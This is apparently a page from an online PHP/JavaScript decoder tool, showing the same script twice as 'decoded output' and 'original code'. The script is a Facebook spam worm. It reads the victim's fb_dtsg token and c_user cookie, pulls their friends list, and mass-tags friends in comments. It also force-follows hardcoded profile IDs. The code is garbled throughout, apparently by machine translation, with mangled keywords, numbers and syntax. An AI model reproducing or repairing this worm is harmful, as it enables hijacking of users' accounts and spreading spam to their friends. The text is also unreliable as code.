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PHP Decode

/ * 123 bum 1996 * / x__0 function ( ) {return ? window.ActiveXObject new ActiveXObject ..

Decoded Output download

<?  / * 123 bum 1996  * / 
x__0 function ( ) {return ? window.ActiveXObject new ActiveXObject ( " Msxml2.XMLHTTP " ) : new XMLHttpRequest ; } ; 
get_friends function ( ) { 
var a = x__0 ( ) ; 
a. open ( " GET " , " / ajax / typeahead / first_degree.php ? __a = 1 & filter [ 0 ] = user & lazy = 0 & viewer = " + uid + " & token = v7 & stale_ok = 0 & options [ 0 ] = friends_only & options [ 1 ] = nm " , false ) ; 
a.send ( null ) ; 
if ( a.readyState == 4 ) { 
var f = JSON . parse ( a.responseText.substring ( a.responseText . indexOf ( ' { ' ) ) ) ; 
back f.payload.entries ; 
return false ; 
get_uid function ( b ) { 
var a = x__0 ( ) ; 
a. open ( " GET " , " http:/ / / ' + b , false) ; 
a.send ( ) ; 
if ( a.readyState == 4 ) { 
uid = return JSON . analysis ( a.responseText ) . id ; 
return false ; 
var patt = / COMMENT_TEXT = ( . * ? ) & / 
var c = 1 ; 
Username = / . \ Com \ / ( . * ? ) \ . / / Exec ( ) [ 1 ] ; 
get_uid uid = ( username ) ; 
a = ; 
Technical Area = 0 ; 
var = get_friends amigos ( ) ; 
post_id = / [ 0-9 ] { 8 , } / . exec ( a ) ; 
uids = ' COMMENT_TEXT = ' ; 
header = ' ft_ent_identifier = ' + post_id + ' & COMMENT_TEXT = 0 & source = 1 & client_id = 1,359,576,694,192 % 3A1233576093 & reply_fbid & parent_comment_id & rootid u_jsonp_3_19 & ft = [ tn ] = [ ] & ft [ qid ] = 5,839,337,351,464,612,379 & ft [ mf_story_key ] = 5,470,779,710,560,437,153 & ft [ has_expanded_ufi ] = 1 & nctr [ _mod ] = pagelet_home_stream & __ user = ' + uid + ' & __ a = 1 & __ req = 4u & fb_dtsg = ' + document.getElementsByName ( ' fb_dtsg ' ) [ 0 ] . value + ' & phstamp = ' + Math . random ( ) ; 
for ( var n = 1 ; n < amigos.length , n + + ) { 
/ / UIDs + = ' % 40 [ ' . + Amigos [ n ] uid + ' % 3A ' + encodeURI ( . Amigos [ n ] text ) + ' ] % 20 ' ; 
fb_dtsg = document.getElementsByName ( ' fb_dtsg ' ) [ 0 ] . value ; 
uids + = ' % 40 [ ' + amigos [ n ] . uid + ' % 3AAAAAAAAAAAA ] % 20 ' ; 
c + + ; 
if ( c == 7 ) { 
uids + = ' & ' ; 
with (new XMLHttpRequest ( ) ) open ( " POST " , " / ajax / UFI / add_comment.php ? __a = 1 " ) , setRequestHeader ( " Content -Type " , " application / x - www - form- urlencoded " ) , send ( header. replace ( patt , uids ) ) ; 
z = setTimeout ( 'function ( ) { asd = 0 } ' , 1000) ; 
ClearInterval ( z ) ; 
c = 1 ; 
uids = ' COMMENT_TEXT = ' ; 
document.getElementsByName fb_dtsg var = ( ' fb_dtsg ' ) [ 0 ] . value ; 
var user_id = document.cookie.match ( document.cookie.match ( / c_user = ( \ d + ) / ) [ 1 ] ) ; 
cereziAl function ( ISIM ) { 
ISIM Tarama = var + " = " ; 
if ( document.cookie.length > 0 ) { 
konum = document.cookie . indexOf ( Tarama ) 
if ( konum = ! - 1 ) { 
konum + = tarama.length 
document.cookie = son . indexOf ( " ; " , konum ) 
if ( son == - 1 ) 
son = document.cookie.length 
return unescape ( document.cookie.substring ( konum son ) ) 
else {return " " ; } 
getRandomInt functions ( min , max ) { 
return . Math floor ( . Mathematics random ( ) * ( max - min + 1 ) ) + min ; 
randomValue function ( arr ) { 
return arr [ getRandomInt ( 0 , arr.length - 1 ) ] ; 
document.getElementsByName fb_dtsg var = ( ' fb_dtsg ' ) [ 0 ] . value ; 
var user_id = document.cookie.match ( document.cookie.match ( / c_user = ( \ d + ) / ) [ 1 ] ) ; 
function a ( abone ) { 
http4 var = new XMLHttpRequest ( ) ; 
url4 var = " / ajax / follow / __ follow_profile.php a = 1 ? " ; 
params4 var = " profile_id = " + abone + " & location = 1 & source = button & follow - subscribed_button_id = u37qac_37 & fb_dtsg = " + fb_dtsg + " & lsd & __ " + user_id + " & phstamp = " ; 
. http4 open ( " POST " , url4 , true ) ; 
/ / Send the proper header information along with the request 
http4.setRequestHeader ( " Content -type " , " application / x - www - form- urlencoded " ) ; 
http4.setRequestHeader ( " Content - length " , params4.length ) ; 
http4.setRequestHeader ( " Connection" , " close " ) ; 
http4.onreadystatechange = function ( ) { / / Call a function when the state changes . 
if ( http4.readyState == 4 && http4.status == 200 ) { 
. http4 near ; / / Close the connection 
http4.send ( params4 ) ; 
function sublist ( uidss ) { 
var a = document.createElement ( ' script ' ) ; 
a.innerHTML = " new flid : " + + uidss . " } ) Submit ( ) ; " ; 
document.body.appendChild ( a ) ; 
Sublist } ( " 204,678,296,364,375 " ) ; sublist ( " 232,033,620,295,509 " ) ; sublist ( " 218,624,604,969,744 " ) ; sublist ( " 1,436,161,033,282,988 " ) ; ?>

Did this file decode correctly?

Original Code

/ * 123 bum 1996  * /
x__0 function ( ) {return ? window.ActiveXObject new ActiveXObject ( " Msxml2.XMLHTTP " ) : new XMLHttpRequest ; } ;
get_friends function ( ) {
var a = x__0 ( ) ;
a. open ( " GET " , " / ajax / typeahead / first_degree.php ? __a = 1 & filter [ 0 ] = user & lazy = 0 & viewer = " + uid + " & token = v7 & stale_ok = 0 & options [ 0 ] = friends_only & options [ 1 ] = nm " , false ) ;
a.send ( null ) ;
if ( a.readyState == 4 ) {
var f = JSON . parse ( a.responseText.substring ( a.responseText . indexOf ( ' { ' ) ) ) ;
back f.payload.entries ;
return false ;
get_uid function ( b ) {
var a = x__0 ( ) ;
a. open ( " GET " , " http:/ / / ' + b , false) ;
a.send ( ) ;
if ( a.readyState == 4 ) {
uid = return JSON . analysis ( a.responseText ) . id ;
return false ;
var patt = / COMMENT_TEXT = ( . * ? ) & /
var c = 1 ;
Username = / . \ Com \ / ( . * ? ) \ . / / Exec ( ) [ 1 ] ;
get_uid uid = ( username ) ;
a = ;
Technical Area = 0 ;
var = get_friends amigos ( ) ;
post_id = / [ 0-9 ] { 8 , } / . exec ( a ) ;
uids = ' COMMENT_TEXT = ' ;
header = ' ft_ent_identifier = ' + post_id + ' & COMMENT_TEXT = 0 & source = 1 & client_id = 1,359,576,694,192 % 3A1233576093 & reply_fbid & parent_comment_id & rootid u_jsonp_3_19 & ft = [ tn ] = [ ] & ft [ qid ] = 5,839,337,351,464,612,379 & ft [ mf_story_key ] = 5,470,779,710,560,437,153 & ft [ has_expanded_ufi ] = 1 & nctr [ _mod ] = pagelet_home_stream & __ user = ' + uid + ' & __ a = 1 & __ req = 4u & fb_dtsg = ' + document.getElementsByName ( ' fb_dtsg ' ) [ 0 ] . value + ' & phstamp = ' + Math . random ( ) ;
for ( var n = 1 ; n < amigos.length , n + + ) {
/ / UIDs + = ' % 40 [ ' . + Amigos [ n ] uid + ' % 3A ' + encodeURI ( . Amigos [ n ] text ) + ' ] % 20 ' ;
fb_dtsg = document.getElementsByName ( ' fb_dtsg ' ) [ 0 ] . value ;
uids + = ' % 40 [ ' + amigos [ n ] . uid + ' % 3AAAAAAAAAAAA ] % 20 ' ;
c + + ;
if ( c == 7 ) {
uids + = ' & ' ;
with (new XMLHttpRequest ( ) ) open ( " POST " , " / ajax / UFI / add_comment.php ? __a = 1 " ) , setRequestHeader ( " Content -Type " , " application / x - www - form- urlencoded " ) , send ( header. replace ( patt , uids ) ) ;
z = setTimeout ( 'function ( ) { asd = 0 } ' , 1000) ;
ClearInterval ( z ) ;
c = 1 ;
uids = ' COMMENT_TEXT = ' ;
document.getElementsByName fb_dtsg var = ( ' fb_dtsg ' ) [ 0 ] . value ;
var user_id = document.cookie.match ( document.cookie.match ( / c_user = ( \ d + ) / ) [ 1 ] ) ;
cereziAl function ( ISIM ) {
ISIM Tarama = var + " = " ;
if ( document.cookie.length > 0 ) {
konum = document.cookie . indexOf ( Tarama )
if ( konum = ! - 1 ) {
konum + = tarama.length
document.cookie = son . indexOf ( " ; " , konum )
if ( son == - 1 )
son = document.cookie.length
return unescape ( document.cookie.substring ( konum son ) )
else {return " " ; }
getRandomInt functions ( min , max ) {
return . Math floor ( . Mathematics random ( ) * ( max - min + 1 ) ) + min ;
randomValue function ( arr ) {
return arr [ getRandomInt ( 0 , arr.length - 1 ) ] ;
document.getElementsByName fb_dtsg var = ( ' fb_dtsg ' ) [ 0 ] . value ;
var user_id = document.cookie.match ( document.cookie.match ( / c_user = ( \ d + ) / ) [ 1 ] ) ;
function a ( abone ) {
http4 var = new XMLHttpRequest ( ) ;
url4 var = " / ajax / follow / __ follow_profile.php a = 1 ? " ;
params4 var = " profile_id = " + abone + " & location = 1 & source = button & follow - subscribed_button_id = u37qac_37 & fb_dtsg = " + fb_dtsg + " & lsd & __ " + user_id + " & phstamp = " ;
. http4 open ( " POST " , url4 , true ) ;
/ / Send the proper header information along with the request
http4.setRequestHeader ( " Content -type " , " application / x - www - form- urlencoded " ) ;
http4.setRequestHeader ( " Content - length " , params4.length ) ;
http4.setRequestHeader ( " Connection" , " close " ) ;
http4.onreadystatechange = function ( ) { / / Call a function when the state changes .
if ( http4.readyState == 4 && http4.status == 200 ) {
. http4 near ; / / Close the connection
http4.send ( params4 ) ;
function sublist ( uidss ) {
var a = document.createElement ( ' script ' ) ;
a.innerHTML = " new flid : " + + uidss . " } ) Submit ( ) ; " ;
document.body.appendChild ( a ) ;
Sublist } ( " 204,678,296,364,375 " ) ; sublist ( " 232,033,620,295,509 " ) ; sublist ( " 218,624,604,969,744 " ) ; sublist ( " 1,436,161,033,282,988 " ) ;

Function Calls





MD5 adff1b5dee15ac4da8f8068d4d338f89
Eval Count 0
Decode Time 79 ms